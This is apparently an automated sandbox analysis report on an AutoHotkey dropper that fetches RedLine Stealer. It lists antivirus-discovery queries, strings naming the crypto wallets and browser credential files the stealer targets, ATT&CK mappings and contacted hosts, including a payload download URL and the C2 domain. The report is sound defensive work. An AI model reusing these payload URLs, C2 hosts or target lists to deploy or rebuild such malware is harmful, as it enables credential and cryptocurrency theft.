                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 2.2.1234.exe.43e5a60.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.1234.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.1234.exe.43e5a60.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.srvs.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ElectrumRule
                      Source: 1234.exe, 0000000F.00000002.385654345.0000000002B23000.00000004.00000001.sdmpString found in binary or memory: JaxxxLiberty
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpath
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ExodusRule
                      Source: srvs.exeString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to steal Crypto Currency WalletsShow sources
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: Nb2HQZZDIf.exeBinary or memory string: WIN_XP
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
                      Source: Nb2HQZZDIf.exeBinary or memory string: WIN_VISTA
                      Source: Nb2HQZZDIf.exeBinary or memory string: WIN_7
                      Source: Nb2HQZZDIf.exeBinary or memory string: WIN_8
                      Source: Nb2HQZZDIf.exeBinary or memory string: WIN_8.1
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 2.2.1234.exe.43e5a60.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.1234.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.1234.exe.43e5a60.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.srvs.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Spearphishing Link1Windows Management Instrumentation221Path InterceptionExploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture21Account Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing23NTDSSystem Information Discovery137Distributed Component Object ModelInput Capture21Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsSecurity Software Discovery861SSHClipboard Data2Data Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion551DCSyncVirtualization/Sandbox Evasion551Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 452456 Sample: Nb2HQZZDIf Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected RedLine Stealer 2->51 53 8 other signatures 2->53 8 Nb2HQZZDIf.exe 14 2->8         started        process3 dnsIp4 41 iplogger.org 88.99.66.31, 443, 49714 HETZNER-ASDE Germany 8->41 43 is.gd 104.25.233.53, 443, 49715 CLOUDFLARENETUS United States 8->43 45 4 other IPs or domains 8->45 29 C:\Users\user\AppData\Roaming\1234.exe, PE32 8->29 dropped 65 Detected unpacking (changes PE section rights) 8->65 67 May check the online IP address of the machine 8->67 69 Sample or dropped binary is a compiled AutoHotkey binary 8->69 13 1234.exe 3 8->13         started        file5 signatures6 process7 signatures8 71 Multi AV Scanner detection for dropped file 13->71 73 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->73 75 Performs DNS queries to domains with low reputation 13->75 77 2 other signatures 13->77 16 1234.exe 15 34 13->16         started        21 1234.exe 13->21         started        process9 dnsIp10 31 yspasenana.xyz 212.224.105.105, 49742, 49744, 49745 DE-FIRSTCOLOwwwfirst-colonetDE Germany 16->31 33 api.ip.sb 16->33 35 6 other IPs or domains 16->35 27 C:\Users\user\AppData\Local\Temp\srvs.exe, PE32 16->27 dropped 55 Tries to steal Crypto Currency Wallets 16->55 23 srvs.exe 14 30 16->23         started        file11 signatures12 process13 dnsIp14 37 api.ip.sb 23->37 39 5.149.255.203, 32800, 49751, 49753 HZ-NL-ASGB United Kingdom 23->39 57 Multi AV Scanner detection for dropped file 23->57 59 Detected unpacking (changes PE section rights) 23->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->61 63 8 other signatures 23->63 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Nb2HQZZDIf.exe22%VirustotalBrowse
                      Nb2HQZZDIf.exe25%ReversingLabsByteCode-MSIL.Infostealer.Reline

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\srvs.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\srvs.exe20%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\srvs.exe36%ReversingLabsWin32.Trojan.GenCBL
                      C:\Users\user\AppData\Roaming\1234.exe33%ReversingLabsByteCode-MSIL.Infostealer.Reline

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.1.Nb2HQZZDIf.exe.140000000.0.unpack100%AviraHEUR/AGEN.1142275Download File
                      15.2.1234.exe.400000.0.unpack100%AviraHEUR/AGEN.1140572Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      yspasenana.xyz1%VirustotalBrowse
                      api.ip.sb2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://bbuseruploads.s3.amazonaws.com40%Avira URL Cloudsafe
                      http://service.r0%URL Reputationsafe
                      http://service.r0%URL Reputationsafe
                      http://service.r0%URL Reputationsafe
                      http://service.r0%URL Reputationsafe
                      http://www.fontbureau.comdTF0%Avira URL Cloudsafe
                      http://ahkscript.org1%VirustotalBrowse
                      http://ahkscript.org0%Avira URL Cloudsafe
                      http://yspasenana.xyz/0%Avira URL Cloudsafe
                      http://www.fontbureau.comsiv0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      https://api.ip.sb/geoip0%URL Reputationsafe
                      https://api.ip.sbx0%Avira URL Cloudsafe
                      http://yspasenana.xyz40%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://www.urwpp.dea(0%Avira URL Cloudsafe
                      http://yspasenana.xyz:80/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      http://www.fontbureau.comalsF0%URL Reputationsafe
                      http://www.fontbureau.comalsF0%URL Reputationsafe
                      http://www.fontbureau.comalsF0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
                      http://www.fontbureau.comap0%Avira URL Cloudsafe
                      http://www.fontbureau.comk:0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
                      http://www.fontbureau.comueto30%Avira URL Cloudsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/-0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/-0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/-0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      http://www.fontbureau.comgrito0%URL Reputationsafe
                      http://www.fontbureau.comgrito0%URL Reputationsafe
                      http://www.fontbureau.comgrito0%URL Reputationsafe
                      http://yspasenana.xyz(h0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://yspasenana.xyz0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/crosU0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/rz0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
                      https://bitbucket.org40%Avira URL Cloudsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://ns.adobe.cobj0%URL Reputationsafe
                      http://www.fontbureau.comcomd0%URL Reputationsafe
                      http://www.fontbureau.comcomd0%URL Reputationsafe
                      http://www.fontbureau.comcomd0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                      http://www.fontbureau.comitum0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://www.fontbureau.comica0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                      http://www.fontbureau.come.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      52.216.94.27
                      truefalse
                        high
                        yspasenana.xyz
                        212.224.105.105
                        truetrueunknown
                        bitbucket.org
                        104.192.141.1
                        truefalse
                          high
                          iplogger.org
                          88.99.66.31
                          truefalse
                            high
                            is.gd
                            104.25.233.53
                            truefalse
                              high
                              bbuseruploads.s3.amazonaws.com
                              unknown
                              unknownfalse
                                high
                                api.ip.sb
                                unknown
                                unknowntrueunknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://yspasenana.xyz/false
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://bbuseruploads.s3.amazonaws.com41234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPsrvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtab1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drfalse
                                    high
                                    http://service.r1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://iplogger.org/1Bwjj7Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drfalse
                                        high
                                        https://is.gd/Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comdTF1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ahkscript.orgNb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bitbucket.org/luisadoma999/admin/downloads/1234.exeNb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                            high
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-website;Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comsiv1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://api.ip.sb/geoip1234.exe, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ip.sbxsrvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://yspasenana.xyz41234.exe, 0000000F.00000002.386040704.0000000002BF7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/soap/envelope/D1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpfalse
                                                high
                                                https://is.gd/dg3E5gS6%Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://tempuri.org/srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226713519.0000000006011000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://ns.adobe.c/g1234.exe, 0000000F.00000003.359594805.0000000008A81000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000003.382117254.0000000008A92000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlyv1234.exe, 00000002.00000003.220716049.0000000006011000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.urwpp.dea(1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://yspasenana.xyz:80/1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/SetEnvironmentsrvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/SetEnvironmentResponse1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.comalsF1234.exe, 00000002.00000003.221286981.0000000006011000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sajatypeworks.com1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/GetUpdatessrvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.google.com/chrome/?p=plugin_real1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/cThe1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
